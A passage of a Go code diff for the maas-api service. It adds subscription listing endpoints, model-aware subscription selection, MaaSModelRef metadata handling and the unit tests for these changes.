response.Data, 2, "Different URLs should create separate entries even with same model ID") + + // Both should have model ID "gpt-4" and subscription "sub-a" + for _, model := range response.Data { + assert.Equal(t, "gpt-4", model.ID) + require.Len(t, model.Subscriptions, 1, "Each model should have 1 subscription") + assert.Equal(t, "sub-a", model.Subscriptions[0].Name) + } + + // Verify we have 2 different URLs + urls := []string{response.Data[0].URL.String(), response.Data[1].URL.String()} + assert.NotEqual(t, urls[0], urls[1], "Should have different URLs") + }) +} + +func TestListModels_DifferentModelRefsWithSameURLAndModelID(t *testing.T) { + testLogger := logger.Development() + + // Create ONE mock server that both MaaSModelRefs will point to + sharedModelServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(http.StatusOK) + _, _ = w.Write(makeModelsResponse("gpt-4")) + })) + t.Cleanup(sharedModelServer.Close) + + // Setup MaaSModelRef lister with two different MaaSModelRefs pointing to the SAME URL + lister := fakeMaaSModelRefLister{ + "namespace-a": []*unstructured.Unstructured{ + maasModelRefUnstructured("gpt-4-ref", "namespace-a", sharedModelServer.URL, true, nil), + }, + "namespace-b": []*unstructured.Unstructured{ + maasModelRefUnstructured("gpt-4-another-ref", "namespace-b", sharedModelServer.URL, true, nil), + }, + } + + // Setup single subscription + createSubscription := func(name string, groups []string) *unstructured.Unstructured { + sub := &unstructured.Unstructured{} + sub.SetGroupVersionKind(schema.GroupVersionKind{ + Group: "maas.opendatahub.io", + Version: "v1alpha1", + Kind: "MaaSSubscription", + }) + sub.SetName(name) + sub.SetNamespace(fixtures.TestNamespace) + + groupSlice := make([]any, len(groups)) + for i, g := range groups { + groupSlice[i] = map[string]any{"name": g} + } + + _ = unstructured.SetNestedMap(sub.Object, 
map[string]any{ + "owner": map[string]any{ + "groups": groupSlice, + }, + }, "spec") + return sub + } + + subscriptionLister := &fakeSubscriptionListerWithMeta{ + subscriptions: []*unstructured.Unstructured{ + createSubscription("sub-a", []string{"user-group"}), + }, + } + + modelMgr, err := models.NewManager(testLogger) + require.NoError(t, err) + + subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister) + + config := fixtures.TestServerConfig{Objects: []runtime.Object{}} + router, _ := fixtures.SetupTestServer(t, config) + + _, cleanup := fixtures.StubTokenProviderAPIs(t, true) + defer cleanup() + + tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) + v1 := router.Group("/v1") + v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) + + t.Run("different MaaSModelRefs with same URL and model ID remain separate entries", func(t *testing.T) { + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + req.Header.Set("X-Maas-Return-All-Models", "true") + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["user-group"]`) + router.ServeHTTP(w, req) + + require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + // Should have 2 entries because different MaaSModelRef resources (different ownedBy) + // even though they have the same URL and model ID + assert.Len(t, response.Data, 2, "Different MaaSModelRef resources should remain separate entries") + + // Both should have model ID "gpt-4" and same URL but different ownedBy + for _, model := range response.Data { + assert.Equal(t, "gpt-4", model.ID) + assert.Equal(t, 
sharedModelServer.URL, model.URL.String()) + require.Len(t, model.Subscriptions, 1, "Each model should have 1 subscription") + assert.Equal(t, "sub-a", model.Subscriptions[0].Name) + // OwnedBy should be either namespace-a/gpt-4-ref or namespace-b/gpt-4-another-ref + assert.Contains(t, []string{"namespace-a/gpt-4-ref", "namespace-b/gpt-4-another-ref"}, model.OwnedBy) + } + }) +} + +func TestListModels_DifferentModelRefsWithSameModelIDAndDifferentSubscriptions(t *testing.T) { + testLogger := logger.Development() + + // Create two mock servers that both return the same model ID "gpt-4" + // One accessible via sub-a, one via sub-b + // Use bare subscription names to match what Authorino injects from API key validation + modelServerA := createMockModelServerWithSubscriptionCheck(t, "gpt-4", "sub-a") + modelServerB := createMockModelServerWithSubscriptionCheck(t, "gpt-4", "sub-b") + + // Setup MaaSModelRef lister with two different MaaSModelRefs in different namespaces + lister := fakeMaaSModelRefLister{ + "namespace-a": []*unstructured.Unstructured{ + maasModelRefUnstructured("gpt-4-ref", "namespace-a", modelServerA.URL, true, nil), + }, + "namespace-b": []*unstructured.Unstructured{ + maasModelRefUnstructured("gpt-4-ref", "namespace-b", modelServerB.URL, true, nil), + }, + } + + // Setup two subscriptions + createSubscription := func(name string, groups []string) *unstructured.Unstructured { + sub := &unstructured.Unstructured{} + sub.SetGroupVersionKind(schema.GroupVersionKind{ + Group: "maas.opendatahub.io", + Version: "v1alpha1", + Kind: "MaaSSubscription", + }) + sub.SetName(name) + sub.SetNamespace(fixtures.TestNamespace) + + groupSlice := make([]any, len(groups)) + for i, g := range groups { + groupSlice[i] = map[string]any{"name": g} + } + + _ = unstructured.SetNestedMap(sub.Object, map[string]any{ + "owner": map[string]any{ + "groups": groupSlice, + }, + }, "spec") + return sub + } + + subscriptionLister := &fakeSubscriptionListerWithMeta{ + subscriptions: 
[]*unstructured.Unstructured{ + createSubscription("sub-a", []string{"user-group"}), + createSubscription("sub-b", []string{"user-group"}), + }, + } + + modelMgr, err := models.NewManager(testLogger) + require.NoError(t, err) + + subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister) + modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister) + + config := fixtures.TestServerConfig{Objects: []runtime.Object{}} + router, _ := fixtures.SetupTestServer(t, config) + + _, cleanup := fixtures.StubTokenProviderAPIs(t, true) + defer cleanup() + + tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant) + v1 := router.Group("/v1") + v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs) + + t.Run("different MaaSModelRefs with same model ID but different URLs return separate entries", func(t *testing.T) { + w := httptest.NewRecorder() + req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil) + require.NoError(t, err) + + req.Header.Set("Authorization", "Bearer valid-token") + req.Header.Set("X-Maas-Return-All-Models", "true") + req.Header.Set(constant.HeaderUsername, "test-user@example.com") + req.Header.Set(constant.HeaderGroup, `["user-group"]`) + router.ServeHTTP(w, req) + + require.Equal(t, http.StatusOK, w.Code) + + var response pagination.Page[models.Model] + err = json.Unmarshal(w.Body.Bytes(), &response) + require.NoError(t, err) + + // Should have 2 entries because URLs are different (even though model ID is same) + assert.Len(t, response.Data, 2, "Different URLs should create separate entries even with same model ID") + + // Both should have model ID "gpt-4" but different URLs and subscriptions + modelsByURL := make(map[string]models.Model) + for _, model := range response.Data { + assert.Equal(t, "gpt-4", model.ID, "Both entries should have model ID gpt-4") + require.Len(t, model.Subscriptions, 1, "Each model should have exactly 1 
subscription") + modelsByURL[model.URL.String()] = model + } + + // Verify we have 2 different URLs + assert.Len(t, modelsByURL, 2, "Should have 2 different URLs") + + // Verify each has the correct subscription + subscriptionNames := make(map[string]bool) + for _, model := range response.Data { + subscriptionNames[model.Subscriptions[0].Name] = true + } + assert.True(t, subscriptionNames["sub-a"], "Should have model with sub-a") + assert.True(t, subscriptionNames["sub-b"], "Should have model with sub-b") + }) +} diff --git a/maas-api/internal/models/discovery.go b/maas-api/internal/models/discovery.go index c4a454cdb..411b16d49 100644 --- a/maas-api/internal/models/discovery.go +++ b/maas-api/internal/models/discovery.go @@ -72,7 +72,8 @@ func (m *Manager) FilterModelsByAccess(ctx context.Context, models []Model, auth return models } m.logger.Debug("FilterModelsByAccess: validating access for models", "count", len(models), "subscriptionHeaderProvided", subscriptionHeader != "") - var out []Model + // Initialize to empty slice (not nil) so JSON marshals as [] instead of null when no models are accessible + out := []Model{} var mu sync.Mutex g, ctx := errgroup.WithContext(ctx) g.SetLimit(maxDiscoveryConcurrency) @@ -140,10 +141,8 @@ func discoveredToModels(discovered []openai.Model, original Model) []Model { if d.ID == "" { continue } - ownedBy := d.OwnedBy - if ownedBy == "" { - ownedBy = original.OwnedBy - } + // Always use the trusted namespace from MaaSModelRef (original.OwnedBy) + // Never trust backend-returned OwnedBy to prevent namespace spoofing created := d.Created if created == 0 { created = original.Created @@ -153,7 +152,7 @@ func discoveredToModels(discovered []openai.Model, original Model) []Model { ID: d.ID, Object: "model", Created: created, - OwnedBy: ownedBy, + OwnedBy: original.OwnedBy, }, Kind: original.Kind, URL: original.URL, diff --git a/maas-api/internal/models/maasmodelref.go b/maas-api/internal/models/maasmodelref.go index 
19b7ae17f..d463d6cf3 100644 --- a/maas-api/internal/models/maasmodelref.go +++ b/maas-api/internal/models/maasmodelref.go @@ -7,6 +7,8 @@ import ( "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime/schema" "knative.dev/pkg/apis" + + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/constant" ) const ( @@ -17,16 +19,16 @@ const ( // MaaSModelRefLister lists MaaSModelRef CRs from a cache (e.g. informer-backed). Used for GET /v1/models. type MaaSModelRefLister interface { - // List returns MaaSModelRef unstructured items in the given namespace. - List(namespace string) ([]*unstructured.Unstructured, error) + // List returns all MaaSModelRef unstructured items from all namespaces. + List() ([]*unstructured.Unstructured, error) } // ListFromMaaSModelRefLister converts cached MaaSModelRef items to API models. Uses status.endpoint and status.phase. -func ListFromMaaSModelRefLister(lister MaaSModelRefLister, namespace string) ([]Model, error) { - if lister == nil || namespace == "" { +func ListFromMaaSModelRefLister(lister MaaSModelRefLister) ([]Model, error) { + if lister == nil { return nil, nil } - items, err := lister.List(namespace) + items, err := lister.List() if err != nil { return nil, err } @@ -58,6 +60,19 @@ func maasModelRefToModel(u *unstructured.Unstructured) *Model { if kind == "" { kind = "llmisvc" } + annotations := u.GetAnnotations() + var details *Details + if annotations != nil { + d := Details{ + DisplayName: annotations[constant.AnnotationDisplayName], + Description: annotations[constant.AnnotationDescription], + GenAIUseCase: annotations[constant.AnnotationGenAIUseCase], + ContextWindow: annotations[constant.AnnotationContextWindow], + } + if d.DisplayName != "" || d.Description != "" || d.GenAIUseCase != "" || d.ContextWindow != "" { + details = &d + } + } var urlPtr *apis.URL if endpoint != "" { @@ -72,15 +87,19 @@ func maasModelRefToModel(u *unstructured.Unstructured) *Model { created = t.Unix() } + 
namespace := u.GetNamespace() + // OwnedBy includes both namespace and MaaSModelRef name for dashboard display + ownedBy := namespace + "/" + name return &Model{ Model: openai.Model{ ID: name, Object: "model", Created: created, - OwnedBy: u.GetNamespace(), + OwnedBy: ownedBy, }, - Kind: kind, - URL: urlPtr, - Ready: ready, + Kind: kind, + URL: urlPtr, + Ready: ready, + Details: details, } } diff --git a/maas-api/internal/models/types.go b/maas-api/internal/models/types.go index 20e678a26..a66574de0 100644 --- a/maas-api/internal/models/types.go +++ b/maas-api/internal/models/types.go @@ -12,9 +12,17 @@ import ( // Details contains additional metadata from LLMInferenceService annotations. type Details struct { - GenAIUseCase string `json:"genaiUseCase,omitempty"` - Description string `json:"description,omitempty"` - DisplayName string `json:"displayName,omitempty"` + GenAIUseCase string `json:"genaiUseCase,omitempty"` + Description string `json:"description,omitempty"` + DisplayName string `json:"displayName,omitempty"` + ContextWindow string `json:"contextWindow,omitempty"` +} + +// SubscriptionInfo contains metadata about which subscription provides access to a model. +type SubscriptionInfo struct { + Name string `json:"name"` + DisplayName string `json:"displayName,omitempty"` + Description string `json:"description,omitempty"` } // Model extends openai.Model with additional fields. @@ -28,11 +36,12 @@ type Model struct { // Kind is the model reference kind (e.g. "llmisvc" from MaaSModelRef spec.modelRef.kind). // Used when validating access; default is "llmisvc" if unset. 
- Kind string `json:"kind,omitempty"` - URL *apis.URL `json:"url,omitempty"` - Ready bool `json:"ready"` - Details *Details `json:"modelDetails,omitempty"` - Aliases []string `json:"aliases,omitempty"` + Kind string `json:"kind,omitempty"` + URL *apis.URL `json:"url,omitempty"` + Ready bool `json:"ready"` + Details *Details `json:"modelDetails,omitempty"` + Aliases []string `json:"aliases,omitempty"` + Subscriptions []SubscriptionInfo `json:"subscriptions,omitempty"` // Subscriptions providing access to this model } // UnmarshalJSON implements custom JSON unmarshalling to work around openai.Model's diff --git a/maas-api/internal/subscription/handler.go b/maas-api/internal/subscription/handler.go index c79f11662..b62d13240 100644 --- a/maas-api/internal/subscription/handler.go +++ b/maas-api/internal/subscription/handler.go @@ -7,6 +7,7 @@ import ( "github.com/gin-gonic/gin" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/token" ) // Handler handles subscription selection requests. @@ -26,7 +27,7 @@ func NewHandler(log *logger.Logger, selector *Selector) *Handler { } } -// SelectSubscription handles POST /v1/subscriptions/select requests. +// SelectSubscription handles POST /internal/v1/subscriptions/select requests. // // This endpoint is called by Authorino during AuthPolicy evaluation to determine // which subscription a user should be assigned to. 
The request contains authenticated @@ -63,14 +64,16 @@ func (h *Handler) SelectSubscription(c *gin.Context) { "username", req.Username, "groups", req.Groups, "requestedSubscription", req.RequestedSubscription, + "requestedModel", req.RequestedModel, ) - response, err := h.selector.Select(req.Groups, req.Username, req.RequestedSubscription) + response, err := h.selector.Select(req.Groups, req.Username, req.RequestedSubscription, req.RequestedModel) if err != nil { var noSubErr *NoSubscriptionError var notFoundErr *SubscriptionNotFoundError var accessDeniedErr *AccessDeniedError var multipleSubsErr *MultipleSubscriptionsError + var modelNotInSubErr *ModelNotInSubscriptionError if errors.As(err, &noSubErr) { h.logger.Debug("No subscription found for user", @@ -119,6 +122,18 @@ func (h *Handler) SelectSubscription(c *gin.Context) { return } + if errors.As(err, &modelNotInSubErr) { + h.logger.Debug("Model not included in subscription", + "subscription", modelNotInSubErr.Subscription, + "model", modelNotInSubErr.Model, + ) + c.JSON(http.StatusOK, SelectResponse{ + Error: "model_not_in_subscription", + Message: err.Error(), + }) + return + } + // All other errors are internal server errors h.logger.Error("Subscription selection failed", "error", err.Error(), @@ -138,3 +153,94 @@ func (h *Handler) SelectSubscription(c *gin.Context) { ) c.JSON(http.StatusOK, response) } + +// ListSubscriptions handles GET /v1/subscriptions. +// Returns all subscriptions the authenticated user has access to. 
+func (h *Handler) ListSubscriptions(c *gin.Context) { + userContextVal, exists := c.Get("user") + if !exists { + h.logger.Error("User context not found - ExtractUserInfo middleware not called") + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Internal server error", + "type": "server_error", + }}) + return + } + userContext, ok := userContextVal.(*token.UserContext) + if !ok { + h.logger.Error("Invalid user context type") + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Internal server error", + "type": "server_error", + }}) + return + } + + accessible, err := h.selector.GetAllAccessible(userContext.Groups, userContext.Username) + if err != nil { + h.logger.Error("Failed to list subscriptions", "error", err) + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Failed to list subscriptions", + "type": "server_error", + }}) + return + } + + subs := make([]SubscriptionInfo, len(accessible)) + for i, sub := range accessible { + subs[i] = ResponseToSubscriptionInfo(sub) + } + + c.JSON(http.StatusOK, subs) +} + +// ListSubscriptionsForModel handles GET /v1/model/:model-id/subscriptions. +// Returns subscriptions the user has access to that include the specified model. 
+func (h *Handler) ListSubscriptionsForModel(c *gin.Context) { + userContextVal, exists := c.Get("user") + if !exists { + h.logger.Error("User context not found - ExtractUserInfo middleware not called") + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Internal server error", + "type": "server_error", + }}) + return + } + userContext, ok := userContextVal.(*token.UserContext) + if !ok { + h.logger.Error("Invalid user context type") + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Internal server error", + "type": "server_error", + }}) + return + } + + modelID := c.Param("model-id") + if modelID == "" { + c.JSON(http.StatusBadRequest, gin.H{ + "error": gin.H{ + "message": "model-id is required", + "type": "invalid_request_error", + }}) + return + } + + subs, err := h.selector.ListAccessibleForModel(userContext.Username, userContext.Groups, modelID) + if err != nil { + h.logger.Error("Failed to list subscriptions for model", "error", err, "model", modelID) + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Failed to list subscriptions", + "type": "server_error", + }}) + return + } + + c.JSON(http.StatusOK, subs) +} diff --git a/maas-api/internal/subscription/handler_test.go b/maas-api/internal/subscription/handler_test.go index 6102c7c79..3bdb679c6 100644 --- a/maas-api/internal/subscription/handler_test.go +++ b/maas-api/internal/subscription/handler_test.go @@ -12,6 +12,7 @@ import ( "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/token" ) // mockLister implements subscription.Lister for testing. 
@@ -47,7 +48,8 @@ func createTestSubscription(name string, groups []string, priority int32, orgID, "name": "test-model", "tokenRateLimits": []any{ map[string]any{ - "limit": int64(1000), + "limit": int64(1000), + "window": "1m", }, }, }, @@ -206,34 +208,45 @@ func TestHandler_SelectSubscription_AccessDenied(t *testing.T) { lister := &mockLister{subscriptions: subscriptions} router := setupTestRouter(lister) - reqBody := subscription.SelectRequest{ - Groups: []string{"basic-users"}, - Username: "alice", - RequestedSubscription: "premium-sub", // Alice doesn't have access - } - jsonBody, err := json.Marshal(reqBody) - if err != nil { - t.Fatalf("failed to marshal request: %v", err) + testAccessDenied := func(t *testing.T, requestedSubscription, expectedError string) { + t.Helper() + reqBody := subscription.SelectRequest{ + Groups: []string{"basic-users"}, + Username: "alice", + RequestedSubscription: requestedSubscription, + } + jsonBody, err := json.Marshal(reqBody) + if err != nil { + t.Fatalf("failed to marshal request: %v", err) + } + + req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Errorf("expected status 200, got %d", w.Code) + } + + var response subscription.SelectResponse + if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if response.Error != expectedError { + t.Errorf("expected error code %q, got %q", expectedError, response.Error) + } } - req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody)) - req.Header.Set("Content-Type", "application/json") - w := httptest.NewRecorder() - - router.ServeHTTP(w, req) + t.Run("bare name without access returns access_denied", func(t *testing.T) { + testAccessDenied(t, "premium-sub", "access_denied") + }) - if 
w.Code != http.StatusOK { - t.Errorf("expected status 200, got %d", w.Code) - } - - var response subscription.SelectResponse - if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil { - t.Fatalf("failed to unmarshal response: %v", err) - } - - if response.Error != "access_denied" { - t.Errorf("expected error code 'access_denied', got %q", response.Error) - } + t.Run("qualified name without access returns access_denied", func(t *testing.T) { + testAccessDenied(t, "test-ns/premium-sub", "access_denied") + }) } func TestHandler_SelectSubscription_InvalidRequest(t *testing.T) { @@ -280,7 +293,8 @@ func TestHandler_SelectSubscription_UserWithoutGroups(t *testing.T) { "name": "test-model", "tokenRateLimits": []any{ map[string]any{ - "limit": int64(1000), + "limit": int64(1000), + "window": "1m", }, }, }, @@ -556,3 +570,620 @@ func TestHandler_SelectSubscription_MultipleSubscriptions(t *testing.T) { }) } } + +// createTestSubscriptionWithModels creates a subscription with specific model references. +// All test subscriptions use "tenant-a" namespace. 
+func createTestSubscriptionWithModels( + name string, groups []string, + models []struct{ ns, name string }, + priority int32, orgID, costCenter string, +) *unstructured.Unstructured { + groupsSlice := make([]any, len(groups)) + for i, g := range groups { + groupsSlice[i] = map[string]any{"name": g} + } + + modelRefsSlice := make([]any, len(models)) + for i, m := range models { + modelRefsSlice[i] = map[string]any{ + "namespace": m.ns, + "name": m.name, + "tokenRateLimits": []any{ + map[string]any{ + "limit": int64(1000), + "window": "1m", + }, + }, + } + } + + return &unstructured.Unstructured{ + Object: map[string]any{ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": map[string]any{ + "name": name, + "namespace": "tenant-a", + }, + "spec": map[string]any{ + "owner": map[string]any{ + "groups": groupsSlice, + }, + "priority": int64(priority), + "modelRefs": modelRefsSlice, + "tokenMetadata": map[string]any{ + "organizationId": orgID, + "costCenter": costCenter, + "labels": map[string]any{ + "env": "test", + }, + }, + }, + }, + } +} + +// --- Subscription && /v1/model/:model-id/subscriptions endpoints tests --- + +func createTestSubscriptionWithAnnotations(name string, groups []string, modelNames []string, annotations map[string]string) *unstructured.Unstructured { + groupsSlice := make([]any, len(groups)) + for i, g := range groups { + groupsSlice[i] = map[string]any{"name": g} + } + + modelRefs := make([]any, len(modelNames)) + for i, m := range modelNames { + modelRefs[i] = map[string]any{ + "name": m, + "tokenRateLimits": []any{ + map[string]any{"limit": int64(1000), "window": "1m"}, + }, + } + } + + metadata := map[string]any{ + "name": name, + "namespace": "test-ns", + } + if len(annotations) > 0 { + annMap := make(map[string]any, len(annotations)) + for k, v := range annotations { + annMap[k] = v + } + metadata["annotations"] = annMap + } + + return &unstructured.Unstructured{ + Object: map[string]any{ + 
"apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": metadata, + "spec": map[string]any{ + "owner": map[string]any{ + "groups": groupsSlice, + }, + "priority": int64(10), + "modelRefs": modelRefs, + }, + }, + } +} + +// runSelectSubscriptionTest executes a subscription selection test case. +func runSelectSubscriptionTest( + t *testing.T, router *gin.Engine, + groups []string, username, requestedSubscription, requestedModel string, + expectedName, expectedError, description string, +) { + t.Helper() + + reqBody := subscription.SelectRequest{ + Groups: groups, + Username: username, + RequestedSubscription: requestedSubscription, + RequestedModel: requestedModel, + } + jsonBody, err := json.Marshal(reqBody) + if err != nil { + t.Fatalf("failed to marshal request: %v", err) + } + + req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Errorf("%s: expected status 200, got %d", description, w.Code) + } + + var response subscription.SelectResponse + if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if expectedError != "" { + // Expecting an error response + if response.Error != expectedError { + t.Errorf("%s: expected error code %q, got %q. Message: %s", description, expectedError, response.Error, response.Message) + } + } else { + // Expecting a success response + if response.Name != expectedName { + t.Errorf("%s: expected subscription %q, got %q", description, expectedName, response.Name) + } + } +} + +// TestHandler_SelectSubscription_ModelBasedAutoSelection tests auto-selection based on model availability. 
+func TestHandler_SelectSubscription_ModelBasedAutoSelection(t *testing.T) { + // Create subscriptions with different models + subscriptions := []*unstructured.Unstructured{ + createTestSubscriptionWithModels("gold", []string{"premium-users"}, []struct{ ns, name string }{ + {ns: "models", name: "llm"}, + {ns: "models", name: "embedding"}, + }, 10, "org-gold", "cc-gold"), + createTestSubscriptionWithModels("silver", []string{"premium-users"}, []struct{ ns, name string }{ + {ns: "models", name: "small-model"}, + }, 10, "org-silver", "cc-silver"), + } + + lister := &mockLister{subscriptions: subscriptions} + router := setupTestRouter(lister) + + tests := []struct { + name string + groups []string + username string + requestedModel string + expectedName string + expectedError string + description string + }{ + { + name: "auto-select when only gold has llm model", + groups: []string{"premium-users"}, + username: "alice", + requestedModel: "models/llm", + expectedName: "gold", + description: "User has access to both gold and silver, but only gold has models/llm. Should auto-select gold.", + }, + { + name: "auto-select when only silver has small-model", + groups: []string{"premium-users"}, + username: "alice", + requestedModel: "models/small-model", + expectedName: "silver", + description: "User has access to both gold and silver, but only silver has models/small-model. Should auto-select silver.", + }, + { + name: "auto-select when only gold has embedding model", + groups: []string{"premium-users"}, + username: "alice", + requestedModel: "models/embedding", + expectedName: "gold", + description: "User has access to both gold and silver, but only gold has models/embedding. 
Should auto-select gold.", + }, + { + name: "error when no subscription has the requested model", + groups: []string{"premium-users"}, + username: "alice", + requestedModel: "models/nonexistent", + expectedError: "not_found", + description: "User has access to gold and silver, but neither has models/nonexistent. Should return not_found error.", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + reqBody := subscription.SelectRequest{ + Groups: tt.groups, + Username: tt.username, + RequestedModel: tt.requestedModel, + } + jsonBody, err := json.Marshal(reqBody) + if err != nil { + t.Fatalf("failed to marshal request: %v", err) + } + + req := httptest.NewRequest(http.MethodPost, "/subscriptions/select", bytes.NewBuffer(jsonBody)) + req.Header.Set("Content-Type", "application/json") + w := httptest.NewRecorder() + + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Errorf("%s: expected status 200, got %d", tt.description, w.Code) + } + + var response subscription.SelectResponse + if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if tt.expectedError != "" { + // Expecting an error response + if response.Error != tt.expectedError { + t.Errorf("%s: expected error code %q, got %q", tt.description, tt.expectedError, response.Error) + } + } else { + // Expecting a success response + if response.Name != tt.expectedName { + t.Errorf("%s: expected subscription %q, got %q", tt.description, tt.expectedName, response.Name) + } + } + }) + } +} + +// TestHandler_SelectSubscription_ModelValidation tests that explicit subscription selection validates model access. 
+func TestHandler_SelectSubscription_ModelValidation(t *testing.T) { + // Create subscriptions with different models + subscriptions := []*unstructured.Unstructured{ + createTestSubscriptionWithModels("gold", []string{"premium-users"}, []struct{ ns, name string }{ + {ns: "models", name: "llm"}, + }, 10, "org-gold", "cc-gold"), + createTestSubscriptionWithModels("silver", []string{"premium-users"}, []struct{ ns, name string }{ + {ns: "models", name: "small-model"}, + }, 10, "org-silver", "cc-silver"), + } + + lister := &mockLister{subscriptions: subscriptions} + router := setupTestRouter(lister) + + tests := []struct { + name string + groups []string + username string + requestedSubscription string + requestedModel string + expectedName string + expectedError string + description string + }{ + { + name: "explicit selection with correct model", + groups: []string{"premium-users"}, + username: "alice", + requestedSubscription: "gold", + requestedModel: "models/llm", + expectedName: "gold", + description: "User explicitly selects gold subscription which has models/llm. Should succeed.", + }, + { + name: "explicit selection with wrong model", + groups: []string{"premium-users"}, + username: "alice", + requestedSubscription: "silver", + requestedModel: "models/llm", + expectedError: "model_not_in_subscription", + description: "User explicitly selects silver subscription but it doesn't have models/llm. Should return model_not_in_subscription error.", + }, + { + name: "explicit selection gold with small-model", + groups: []string{"premium-users"}, + username: "alice", + requestedSubscription: "gold", + requestedModel: "models/small-model", + expectedError: "model_not_in_subscription", + description: "User explicitly selects gold subscription but it doesn't have models/small-model. 
Should return model_not_in_subscription error.", + }, + { + name: "explicit selection silver with small-model", + groups: []string{"premium-users"}, + username: "alice", + requestedSubscription: "silver", + requestedModel: "models/small-model", + expectedName: "silver", + description: "User explicitly selects silver subscription which has models/small-model. Should succeed.", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + runSelectSubscriptionTest( + t, router, + tt.groups, tt.username, tt.requestedSubscription, tt.requestedModel, + tt.expectedName, tt.expectedError, tt.description, + ) + }) + } +} + +// TestHandler_SelectSubscription_MultipleSubscriptionsSameModel tests behavior when multiple subscriptions have the same model. +func TestHandler_SelectSubscription_MultipleSubscriptionsSameModel(t *testing.T) { + // Create two subscriptions that both have the same model + subscriptions := []*unstructured.Unstructured{ + createTestSubscriptionWithModels("gold", []string{"premium-users"}, []struct{ ns, name string }{ + {ns: "models", name: "llm"}, + }, 10, "org-gold", "cc-gold"), + createTestSubscriptionWithModels("platinum", []string{"premium-users"}, []struct{ ns, name string }{ + {ns: "models", name: "llm"}, + }, 20, "org-platinum", "cc-platinum"), + } + + lister := &mockLister{subscriptions: subscriptions} + router := setupTestRouter(lister) + + tests := []struct { + name string + groups []string + username string + requestedSubscription string + requestedModel string + expectedName string + expectedError string + description string + }{ + { + name: "error when both subscriptions have the model", + groups: []string{"premium-users"}, + username: "alice", + requestedModel: "models/llm", + expectedError: "multiple_subscriptions", + description: "User has access to both gold and platinum, and both have models/llm. 
Should require explicit selection.", + }, + { + name: "explicit selection works when both have model", + groups: []string{"premium-users"}, + username: "alice", + requestedSubscription: "gold", + requestedModel: "models/llm", + expectedName: "gold", + description: "User explicitly selects gold when both subscriptions have the model. Should honor explicit selection.", + }, + { + name: "explicit selection of higher priority subscription", + groups: []string{"premium-users"}, + username: "alice", + requestedSubscription: "platinum", + requestedModel: "models/llm", + expectedName: "platinum", + description: "User explicitly selects platinum (higher priority) when both subscriptions have the model. Should honor explicit selection.", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + runSelectSubscriptionTest( + t, router, + tt.groups, tt.username, tt.requestedSubscription, tt.requestedModel, + tt.expectedName, tt.expectedError, tt.description, + ) + }) + } +} + +func setupListTestRouter(lister subscription.Lister, username string, groups []string) *gin.Engine { + gin.SetMode(gin.TestMode) + router := gin.New() + + log := logger.New(false) + selector := subscription.NewSelector(log, lister) + handler := subscription.NewHandler(log, selector) + + setUser := func(c *gin.Context) { + c.Set("user", &token.UserContext{ + Username: username, + Groups: groups, + }) + c.Next() + } + + router.GET("/v1/subscriptions", setUser, handler.ListSubscriptions) + router.GET("/v1/model/:model-id/subscriptions", setUser, handler.ListSubscriptionsForModel) + return router +} + +func TestListSubscriptions_MultipleAccessible(t *testing.T) { + lister := &mockLister{subscriptions: []*unstructured.Unstructured{ + createTestSubscriptionWithAnnotations("free-sub", []string{"free-users"}, []string{"model-a"}, map[string]string{ + "openshift.io/display-name": "Free Tier", + }), + 